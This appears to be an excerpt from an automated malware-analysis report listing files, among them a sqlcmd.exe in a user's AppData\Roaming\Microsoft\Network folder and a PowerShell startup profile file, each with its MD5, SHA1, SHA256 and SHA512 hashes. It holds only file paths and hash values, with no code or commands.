SHA256 a1bf4f35c43a08cac057588788cfd403e5645f53e694c858a6339be0887e2b10
SHA512 a5b409c6d9e6abd934625b9a2aaa1bd0a69c2260571b1d309205aad03e750e7a05ed488a1c40cab197ab9bfaaf2c9d6b1e966a5a6c5009916f02c10a51dfa4b3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 368b32a9ff59549cdd930323b9f865b4
SHA1 94289afbd7d4a4e651ca376b88174074939e2aef
SHA256 a1bf4f35c43a08cac057588788cfd403e5645f53e694c858a6339be0887e2b10
SHA512 a5b409c6d9e6abd934625b9a2aaa1bd0a69c2260571b1d309205aad03e750e7a05ed488a1c40cab197ab9bfaaf2c9d6b1e966a5a6c5009916f02c10a51dfa4b3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180